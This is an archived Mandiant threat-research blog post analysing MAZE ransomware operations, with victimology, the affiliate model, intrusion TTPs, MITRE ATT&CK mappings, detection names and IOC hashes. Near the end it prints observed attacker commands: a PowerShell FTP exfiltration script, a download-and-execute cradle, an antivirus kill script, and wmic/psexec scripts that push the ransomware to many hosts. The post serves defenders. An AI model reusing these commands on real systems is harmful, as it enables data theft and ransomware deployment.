{
	"id": "0fd8008d-3abd-4cb5-8889-6d55cc7dc4b1",
	"created_at": "2026-04-06T00:18:14.348592Z",
	"updated_at": "2026-04-10T03:38:09.831898Z",
	"deleted_at": null,
	"sha1_hash": "82399333ab6ed280ea6f85aab99c3c267f3dec98",
	"title": "Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1496683,
	"plain_text": "Navigating the MAZE: Tactics, Techniques and Procedures\r\nAssociated With MAZE Ransomware Incidents\r\nBy Mandiant\r\nPublished: 2020-07-05 · Archived: 2026-04-05 14:11:34 UTC\r\nWritten by: Jeremy Kennelly, Kimberly Goody, Joshua Shilko\r\nTargeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across\r\nindustries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our\r\ninvestigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other\r\naspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware\r\nbeing used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate\r\nmodel.\r\nMalicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was\r\ninitially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise.\r\nMultiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in\r\nunderground forums and distinct tactics, techniques, and procedures across Mandiant incident response\r\nengagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from\r\nvictims who refuse to pay an extortion fee.\r\nThe combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise\r\nnetworks—with a criminal service makes MAZE a notable threat to many organizations. 
This blog post is based\r\non information derived from numerous Mandiant incident response engagements and our own research into the\r\nMAZE ecosystem and operations.\r\nMandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21\r\nwebinar.\r\nVictimology\r\nWe are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE\r\nwebsite since November 2019. These organizations have been primarily based in North America, although victims\r\nspanned nearly every geographical region. Nearly every industry sector, including manufacturing, legal, financial\r\nservices, construction, healthcare, technology, retail, and government, has been impacted, demonstrating the\r\nindiscriminate nature of these operations (Figure 1).\r\nhttps://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\nPage 1 of 26\n\nFigure 1: Geographical and industry distribution of alleged MAZE victims\r\nMultiple Actors Involved in MAZE Ransomware Operations Identified\r\nMandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking\r\npartners to fulfill different functional roles within their teams. Additional information on these actors is available\r\nto Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment\r\nhas a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under\r\nan affiliate model and is not distributed by a single group. Under this business model, ransomware developers will\r\npartner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when\r\na victim pays the ransom demand, the ransomware developers receive a commission. 
Direct affiliates of MAZE\r\nransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment.\r\nThis includes partners who provide initial access to organizations and pentesters who are responsible for\r\nreconnaissance, privilege escalation and lateral movement—each of whom appears to work on a percentage basis. Notably, in some cases, actors may be hired on a salary basis (vs. commission) to perform specific tasks such\r\nas determining the victim organization and its annual revenues. This allows for specialization within the cyber\r\ncriminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.\r\nFigure 2: MAZE ransomware panel\r\nMAZE Initially Distributed via Exploit Kits and Spam Campaigns\r\nMAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For\r\nexample, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware\r\nprimarily to individuals at organizations in Germany and the United States, although a significant number of\r\nemails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and\r\npackage delivery themes with document attachments or inline links to documents which download and execute\r\nMaze ransomware.\r\nOn November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject\r\nlines “Wichtige informationen uber Steuerruckerstattung” and “1\u00261 Internet AG - Ihre Rechnung 19340003422\r\nvom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the\r\nFinancial Services, Healthcare, and Manufacturing sectors being targeted most frequently. 
These emails were sent\r\nusing a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.\r\nFigure 3: German-language lure\r\nOn November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located\r\nin the United States. These emails originated from a compromised or spoofed account and contained an inline link\r\nto download a Maze executable payload.\r\nOn November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United\r\nStates and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5).\r\nThese emails used the subjects “Missed package delivery” and \"Your AT\u0026T wireless bill is ready to view\" and\r\nwere sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably,\r\nthis registrant address was also used to create multiple Italian-language domains towards the end of November\r\n2019.\r\nFigure 4: AT\u0026T email lure\r\nFigure 5: Canada Post email lure\r\nShift to Post-Compromise Distribution Maximizes Impact\r\nActors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology\r\nprovides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged\r\nto apply additional pressure on organizations to pay extortion fees. 
Notably, in at least some cases, the actors\r\nbehind these operations charge an additional fee, beyond the payment for the decryption key, for the non-release of stolen\r\ndata.\r\nAlthough the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar,\r\nthere have been notable variations across intrusions that suggest attribution to distinct teams. Even within these\r\nteams, the cyber criminals appear to be task-oriented, meaning that one operator is not responsible for the full\r\nlifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the\r\ndivergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these\r\noperations. Notably, the time from initial compromise to encryption has also varied widely, from weeks\r\nto many months.\r\nInitial Compromise\r\nThere are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent\r\nwith our observations of multiple actors who use MAZE soliciting partners with network access. The following\r\nare a sample of observations from several Mandiant incident response engagements:\r\nA user downloaded a malicious resume-themed Microsoft Word document that contained macros which\r\nlaunched an IcedID payload, which was ultimately used to execute an instance of BEACON.\r\nAn actor logged into an internet-facing system via RDP. The account used to grant initial access was a\r\ngeneric support account. It is unclear how the actor obtained the account's password.\r\nAn actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy\r\ntools to pivot into the internal network.\r\nAn actor logged into a Citrix web portal account with a weak password. 
This authenticated access enabled\r\nthe actor to launch a Meterpreter payload on an internal system.\r\nEstablish Foothold \u0026 Maintain Presence\r\nThe use of legitimate credentials and broad distribution of BEACON across victim environments appear to be\r\nconsistent approaches used by actors to establish their foothold in victim networks and to maintain presence as\r\nthey look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace\r\nbehaviors, we have observed an actor create their own domain account to enable later-stage operations.\r\nAcross multiple incidents, threat actors deploying MAZE established a foothold in victim environments by\r\ninstalling BEACON payloads on many servers and workstations.\r\nWeb shells were deployed to an internet-facing system. The system-level access granted by these web\r\nshells was used to enable initial privilege escalation and the execution of a backdoor.\r\nIntrusion operators regularly obtained and maintained access to multiple domain and local system accounts\r\nwith varying permissions that were used throughout their operations.\r\nAn actor created a new domain account and added it to the domain administrators group.\r\nEscalate Privileges\r\nAlthough Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect\r\ncredentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of\r\nBloodhound, and more manual searches for files containing credentials.\r\nLess than two weeks after initial access, the actor downloaded and interacted with an archive named\r\nmimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following\r\ndays, the same mimi.zip archive was identified on two domain controllers in the impacted environment.\r\nThe actor attempted to find files with the word “password” within the environment. 
Additionally, several\r\narchive files were created with file names suggestive of credential harvesting activity.\r\nThe actor attempted to identify hosts running the KeePass password safe software.\r\nAcross multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of\r\nobtaining credentials with domain administrator privileges.\r\nActors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their\r\nintrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts\r\nto understand the impacted organization's Active Directory configuration. In this case, the responsible\r\nactors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.\r\nReconnaissance\r\nMandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance\r\nacross observed MAZE incidents. The varied tools and approaches across these incidents perhaps best highlight\r\nthe divergent ways in which the responsible actors interact with victim networks.\r\nIn some intrusions, reconnaissance activity occurred within three days of gaining initial access to the\r\nvictim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike\r\nto collect network, host, filesystem, and domain-related information.\r\nMultiple built-in Windows commands were used to enable network, account, and host reconnaissance of\r\nthe impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to\r\nsupport this stage of their operations.\r\nPreliminary network reconnaissance has been conducted using a batch script named '2.bat' which contained\r\na series of nslookup commands. 
The output of this script was copied into a file named '2.txt'.\r\nThe actor exfiltrated reconnaissance command output data and documents related to the IT environment to\r\nan attacker-controlled FTP server via an encoded PowerShell script.\r\nOver a period of several days, an actor conducted reconnaissance activity using Bloodhound,\r\nPowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate\r\ndirectories across internal hosts.\r\nAn actor employed the adfind tool and a batch script to collect information about the victim's network, hosts,\r\ndomain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z'\r\nusing an instance of the 7zip archiving utility named 7.exe.\r\nAn actor used the tool smbtools.exe to assess whether accounts could log in to systems across the\r\nenvironment.\r\nAn actor collected directory listings from file servers across an impacted environment. Evidence of data\r\nexfiltration was observed approximately one month later, suggesting that the creation of these directory\r\nlistings may have been precursor activity, providing the actors with data they may have used to identify\r\nsensitive data for future exfiltration.\r\nLateral Movement\r\nAcross the majority of MAZE ransomware incidents, lateral movement was accomplished via Cobalt Strike\r\nBEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and\r\napproaches were also observed.\r\nAttackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment,\r\nthough they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate RDP\r\nsessions to enable both lateral movement and privilege escalation.\r\nThe actor moved laterally throughout some networks leveraging compromised service and user accounts\r\nobtained from the system on which they gained their initial foothold. 
This allowed them to obtain\r\nimmediate access to additional systems. Stolen credentials were then used to move laterally across the\r\nnetwork via RDP and to install BEACON payloads, providing the actors with access to nearly one hundred\r\nhosts.\r\nAn actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a\r\nlocal administrator account.\r\nAt least one actor attempted to perform lateral movement using EternalBlue in early and late 2019;\r\nhowever, there is no evidence that these attempts were successful.\r\nComplete Mission\r\nThere was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While\r\nmalicious actors could monetize stolen data in various ways (e.g. sale in an underground forum, fraud), actors\r\nemploying MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion\r\nfee.\r\nAn actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script\r\ndesigned to upload any files with .7z file extensions to a predefined FTP server using a hard-coded\r\nusername and password. This script appears to be a slight variant of a script first posted to Microsoft\r\nTechNet in 2013.\r\nA different base64-encoded PowerShell command was also used to enable this functionality in a separate\r\nincident.\r\nActors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.\r\nAn actor has been observed employing a file replication utility and copying the stolen data to a cloud file\r\nhosting/sharing service.\r\nPrior to deploying MAZE ransomware, threat actors employed the 7zip utility to archive data from across\r\nvarious corporate file shares. 
These archives were then exfiltrated to an attacker-controlled server via FTP\r\nusing the WinSCP utility.\r\nIn addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network.\r\nNotably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will\r\ndouble, likely to create a sense of urgency around their demands.\r\nFive days after data was exfiltrated from a victim environment, the actor copied a MAZE ransomware\r\nbinary to 15 hosts within the victim environment and successfully executed it on a portion of these\r\nsystems.\r\nAttackers employed batch scripts and a series of .txt files containing host names to distribute and execute\r\nMAZE ransomware on many servers and workstations across the victim environment.\r\nAn actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain\r\nadministrator account created earlier in the intrusion.\r\nImmediately following the exfiltration of sensitive data, the actors began deployment of MAZE\r\nransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. 
The\r\nencryption process proceeded as follows:\r\nA batch script named start.bat was used to execute a series of secondary batch scripts with names\r\nsuch as xaa3x.bat or xab3x.bat.\r\nEach of these batch scripts contained a series of commands that employed the copy command,\r\nWMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE\r\nransomware (sss.exe) on hosts across the impacted environment.\r\nNotably, forensic analysis of the impacted environment revealed MAZE deployment scripts\r\ntargeting ten times as many hosts as were ultimately encrypted.\r\nImplications\r\nBased on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used\r\nthroughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the\r\ninitial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our\r\nRansomware Protection and Containment Strategies blog post and the linked white paper.\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant\r\nSecurity Validation. 
Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security\r\nValidation Customer Portal for more information.\r\nA100-877 - Active Directory - BloodHound, CollectionMethod All\r\nA150-006 - Command and Control - BEACON, Check-in\r\nA101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1\r\nA101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2\r\nA101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3\r\nA100-878 - Command and Control - MAZE Ransomware, C2 Check-in\r\nA100-887 - Command and Control - MAZE, DNS Query #1\r\nA100-888 - Command and Control - MAZE, DNS Query #2\r\nA100-889 - Command and Control - MAZE, DNS Query #3\r\nA100-890 - Command and Control - MAZE, DNS Query #4\r\nA100-891 - Command and Control - MAZE, DNS Query #5\r\nA100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC\r\nA100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page\r\nA101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2\r\nA100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)\r\nA104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound,\r\nCollectionMethod All\r\nA104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell\r\nA104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy\r\nA104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks\r\nA104-037 - Host CLI - Credential Access, Discovery: File \u0026 Directory Discovery\r\nA104-052 - Host CLI - Credential Access: Mimikatz\r\nA104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)\r\nA104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools\r\nA104-491 - Host CLI - Defense 
Evasion, Persistence: MAZE, Create Target.lnk\r\nA104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection\r\nA104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell\r\nA104-374 - Host CLI - Discovery: Enumerate Active Directory Forests\r\nA104-493 - Host CLI - Discovery: Enumerate Network Shares\r\nA104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User\r\nA104-482 - Host CLI - Discovery: Language Query Using reg query\r\nA104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory\r\nA104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note,\r\nDECRYPT-FILES.html Variant\r\nA104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note,\r\nDECRYPT-FILES.txt Variant\r\nA104-027 - Host CLI - Discovery: Process Discovery\r\nA104-028 - Host CLI - Discovery: Process Discovery with PowerShell\r\nA104-029 - Host CLI - Discovery: Remote System Discovery\r\nA104-153 - Host CLI - Discovery: Security Software Identification with Tasklist\r\nA104-083 - Host CLI - Discovery: System Info\r\nA104-483 - Host CLI - Exfiltration: PowerShell FTP Upload\r\nA104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message\r\nA104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media\r\nA100-879 - Malicious File Transfer - Adfind.exe, Download\r\nA150-046 - Malicious File Transfer - BEACON, Download\r\nA100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant\r\nA100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant\r\nA100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant\r\nA101-037 - Malicious File Transfer - MAZE Download, Variant #1\r\nA101-038 - Malicious File Transfer - MAZE Download, Variant #2\r\nA101-039 - Malicious File Transfer - MAZE Download, Variant #3\r\nA101-040 - Malicious File Transfer - 
MAZE Download, Variant #4\r\nA101-041 - Malicious File Transfer - MAZE Download, Variant #5\r\nA101-042 - Malicious File Transfer - MAZE Download, Variant #6\r\nA101-043 - Malicious File Transfer - MAZE Download, Variant #7\r\nA101-044 - Malicious File Transfer - MAZE Download, Variant #8\r\nA101-045 - Malicious File Transfer - MAZE Download, Variant #9\r\nA101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1\r\nA101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2\r\nA100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4\r\nA101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download\r\nA100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download\r\nA100-886 - Malicious File Transfer - Rclone.exe, Download\r\nA100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration\r\nDetecting the Techniques\r\nPlatform - Signature Name\r\nMVX (covers multiple FireEye technologies) - Bale Detection\r\nMVX (covers multiple FireEye technologies) - FE_Ransomware_Win_MAZE_1\r\nEndpoint Security - WMIC SHADOWCOPY DELETE (METHODOLOGY)\r\nEndpoint Security - MAZE RANSOMWARE (FAMILY)\r\nNetwork Security - Ransomware.Win.MAZE\r\nNetwork Security - Ransomware.Maze\r\nNetwork Security - Ransomware.Maze\r\nMITRE ATT\u0026CK Mappings\r\nMandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of\r\nMAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion\r\nactivity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger\r\nclusters. 
It should also be noted that ‘initial access’ phase techniques have been included in these mappings,\r\nthough in some cases this access may have been provided by a separate threat actor(s).\r\nMAZE Group 1 MITRE ATT\u0026CK Mapping\r\nATT\u0026CK Tactic Category - Techniques\r\nInitial Access\r\nT1133: External Remote Services\r\nT1078: Valid Accounts\r\nExecution\r\nT1059: Command-Line Interface\r\nT1086: PowerShell\r\nT1064: Scripting\r\nT1035: Service Execution\r\nPersistence\r\nT1078: Valid Accounts\r\nT1050: New Service\r\nPrivilege Escalation\r\nT1078: Valid Accounts\r\nDefense Evasion\r\nT1078: Valid Accounts\r\nT1036: Masquerading\r\nT1027: Obfuscated Files or Information\r\nT1064: Scripting\r\nCredential Access\r\nT1110: Brute Force\r\nT1003: Credential Dumping\r\nDiscovery\r\nT1087: Account Discovery\r\nT1482: Domain Trust Discovery\r\nT1083: File and Directory Discovery\r\nT1135: Network Share Discovery\r\nT1069: Permission Groups Discovery\r\nT1018: Remote System Discovery\r\nT1016: System Network Configuration Discovery\r\nLateral Movement\r\nT1076: Remote Desktop Protocol\r\nT1105: Remote File Copy\r\nCollection\r\nT1005: Data from Local System\r\nCommand and Control\r\nT1043: Commonly Used Port\r\nT1105: Remote File Copy\r\nT1071: Standard Application Layer Protocol\r\nExfiltration\r\nT1002: Data Compressed\r\nT1048: Exfiltration Over Alternative Protocol\r\nImpact\r\nT1486: Data Encrypted for Impact\r\nT1489: Service Stop\r\nMAZE Group 2 MITRE ATT\u0026CK Mapping\r\nATT\u0026CK Tactic Category - Techniques\r\nInitial Access\r\nT1193: Spearphishing Attachment\r\nExecution\r\nT1059: Command-Line Interface\r\nT1086: PowerShell\r\nT1085: Rundll32\r\nT1064: 
Scripting\r\nT1204: User Execution\r\nT1028: Windows Remote Management\r\nPersistence\r\nT1078: Valid Accounts\r\nT1050: New Service\r\nT1136: Create Account\r\nPrivilege Escalation\r\nT1078: Valid Accounts\r\nT1050: New Service\r\nDefense Evasion\r\nT1078: Valid Accounts\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1107: File Deletion\r\nT1036: Masquerading\r\nCredential Access\r\nT1003: Credential Dumping\r\nT1081: Credentials in Files\r\nT1171: LLMNR/NBT-NS Poisoning\r\nDiscovery\r\nT1087: Account Discovery\r\nT1482: Domain Trust Discovery\r\nT1083: File and Directory Discovery\r\nT1135: Network Share Discovery\r\nT1069: Permission Groups Discovery\r\nT1018: Remote System Discovery\r\nT1033: System Owner/User Discovery\r\nLateral Movement\r\nT1076: Remote Desktop Protocol\r\nT1028: Windows Remote Management\r\nCollection\r\nT1074: Data Staged\r\nT1005: Data from Local System\r\nT1039: Data from Network Shared Drive\r\nCommand and Control\r\nT1043: Commonly Used Port\r\nT1219: Remote Access Tools\r\nT1105: Remote File Copy\r\nT1071: Standard Application Layer Protocol\r\nT1032: Standard Cryptographic Protocol\r\nExfiltration\r\nT1020: Automated Exfiltration\r\nT1002: Data Compressed\r\nT1048: Exfiltration Over Alternative Protocol\r\nImpact\r\nT1486: Data Encrypted for Impact\r\nMAZE Group 3 MITRE ATT\u0026CK Mapping (FIN6)\r\nATT\u0026CK Tactic Category - Techniques\r\nInitial Access\r\nT1133: External Remote Services\r\nT1078: Valid Accounts\r\nExecution\r\nT1059: Command-Line Interface\r\nT1086: PowerShell\r\nT1064: Scripting\r\nT1035: Service Execution\r\nPersistence\r\nT1078: Valid Accounts\r\nT1031: Modify Existing Service\r\nPrivilege Escalation\r\nT1055: 
Process Injection\r\nT1078: Valid Accounts\r\nDefense Evasion\r\nT1055: Process Injection\r\nT1078: Valid Accounts\r\nT1116: Code Signing\r\nT1089: Disabling Security Tools\r\nT1202: Indirect Command Execution\r\nT1112: Modify Registry\r\nT1027: Obfuscated Files or Information\r\nT1108: Redundant Access\r\nT1064: Scripting\r\nCredential Access\r\nT1003: Credential Dumping\r\nDiscovery\r\nT1087: Account Discovery\r\nT1482: Domain Trust Discovery\r\nT1083: File and Directory Discovery\r\nT1069: Permission Groups Discovery\r\nT1018: Remote System Discovery\r\nLateral Movement\r\nT1097: Pass the Ticket\r\nT1076: Remote Desktop Protocol\r\nT1105: Remote File Copy\r\nT1077: Windows Admin Shares\r\nCollection\r\nT1074: Data Staged\r\nT1039: Data from Network Shared Drive\r\nCommand and Control\r\nT1043: Commonly Used Port\r\nT1219: Remote Access Tools\r\nT1105: Remote File Copy\r\nT1071: Standard Application Layer Protocol\r\nT1032: Standard Cryptographic Protocol\r\nExfiltration\r\nT1002: Data Compressed\r\nImpact\r\nT1486: Data Encrypted for Impact\r\nT1490: Inhibit System Recovery\r\nT1489: Service Stop\r\nExample Commands Observed in MAZE Ransomware Incidents\r\nfunction Enum-UsersFolders($PathEnum)\r\n{\r\n $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'\r\n Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue\r\n Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue\r\n Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue\r\n foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {\r\n foreach($SeachDir in $foldersArr) {\r\n Get-ChildItem -Path 
$PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue\r\n }\r\n }\r\n}\r\nPowerShell reconnaissance script used to enumerate directories\r\n$Dir=\"C:/Windows/Temp/\"\r\n#ftp server\r\n$ftp = \"ftp://\u003cIP Address\u003e/incoming/\"\r\n$user = \"\u003cusername\u003e\"\r\n$pass = \"\u003cpassword\u003e\"\r\n$webclient = New-Object System.Net.WebClient\r\n$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)\r\n#list every sql server trace file\r\nforeach($item in (dir $Dir \"*.7z\")){\r\n \"Uploading $item...\"\r\n $uri = New-Object System.Uri($ftp+$item.Name)\r\n $webclient.UploadFile($uri, $item.FullName)\r\n}\r\nDecoded FTP upload PowerShell script\r\npowershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpF\r\nDecoded FTP upload PowerShell script\r\n[…]\r\necho 7\r\necho 7\r\ntaskkill /im csrss_tc.exe /f\r\ntaskkill /im kwsprod.exe /f\r\ntaskkill /im avkwctl.exe /f\r\ntaskkill /im rnav.exe /f\r\ntaskkill /im crssvc.exe /f\r\nsc config CSAuth start= disabled\r\ntaskkill /im vsserv.exe /f\r\ntaskkill /im ppmcativedetection.exe /f\r\n[…]\r\ntaskkill /im sahookmain.exe /f\r\ntaskkill /im mcinfo.exe /f\r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD\r\nnetsh advfirewall firewall set rule group=\"remote desktop\" new enable=Ye\r\nc:\\windows\\temp\\sss.exe\r\nExcerpt from windows.bat kill script\r\nstart copy sss.exe \\\\\u003cinternal IP\u003e\\c$\\windows\\temp\\\r\nstart copy sss.exe \\\\\u003cinternal IP\u003e\\c$\\windows\\temp\\\r\nstart copy windows.bat \\\\\u003cinternal IP\u003e\\c$\\windows\\temp\\\r\nstart copy windows.bat \\\\\u003cinternal IP\u003e\\c$\\windows\\temp\\\r\nstart wmic /node:\"\u003cinternal IP\u003e\" 
/user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"c:\\wi\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"c:\\wi\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart wmic /node:\"\u003cinternal IP\u003e\" /user:\"\u003cDOMAIN\\adminaccount\u003e\" /password:\"\u003cpassword\u003e\" process call create \"cmd.e\r\nstart psexec.exe \\\\\u003cinternal IP\u003e -u \u003cDOMAIN\\adminaccount\u003e -p \"\u003cpassword\u003e\" -d -h -r rtrsd -s -accepteula -nobanne\r\nstart psexec.exe \\\\\u003cinternal IP\u003e -u \u003cDOMAIN\\adminaccount\u003e -p \"\u003cpassword\u003e\" -d -h -r rtrsd -s -accepteula -nobanne\r\nstart psexec.exe \\\\\u003cinternal IP\u003e -u \u003cDOMAIN\\adminaccount\u003e -p \"\u003cpassword\u003e\" -d -h -r rtrsd -s -accepteula -nobanne\r\nstart psexec.exe \\\\\u003cinternal IP\u003e -u \u003cDOMAIN\\adminaccount\u003e -p \"\u003cpassword\u003e\" -d -h -r rtrsd -s -accepteula -nobanne\r\nExample commands from MAZE distribution scripts\r\n@echo 
off\r\ndel done.txt\r\ndel offline.txt\r\nrem Loop thru list of computer names in file specified on command-line\r\nfor /f %%i in (%1) do call :check_machine %%i\r\ngoto end\r\n:check_machine\r\nrem Check to see if machine is up.\r\nping -n 1 %1|Find \"TTL=\" \u003eNUL 2\u003eNUL\r\nif errorlevel 1 goto down\r\necho %1\r\nSTART cmd /c \"copy [Location of MAZE binary] \\\\%1\\c$\\windows\\temp \u0026\u0026 exit\"\r\ntimeout 1 \u003e NUL\r\necho %1 \u003e\u003e done.txt\r\nrem wmic /node:\"%1\" process call create \"regsvr32.exe /i C:\\windows\\temp\\[MAZE binary name]\" \u003e\u003e done.txt\r\nSTART \"\" cmd /c \"wmic /node:\"%1\" process call create \"regsvr32.exe /i C:\\windows\\temp\\[MAZE binary name]\" \u0026\u0026 exi\r\ngoto end\r\n:down\r\n rem Report machine down\r\n echo %1 \u003e\u003e offline.txt\r\n:end\r\nExample MAZE distribution script\r\nIndicators of Compromise\r\nMaze Payloads\r\n064058cf092063a5b69ed8fd2a1a04fe\r\n0f841c6332c89eaa7cac14c9d5b1d35b\r\n108a298b4ed5b4e77541061f32e55751\r\n11308e450b1f17954f531122a56fae3b\r\n15d7dd126391b0e7963c562a6cf3992c\r\n21a563f958b73d453ad91e251b11855c\r\n
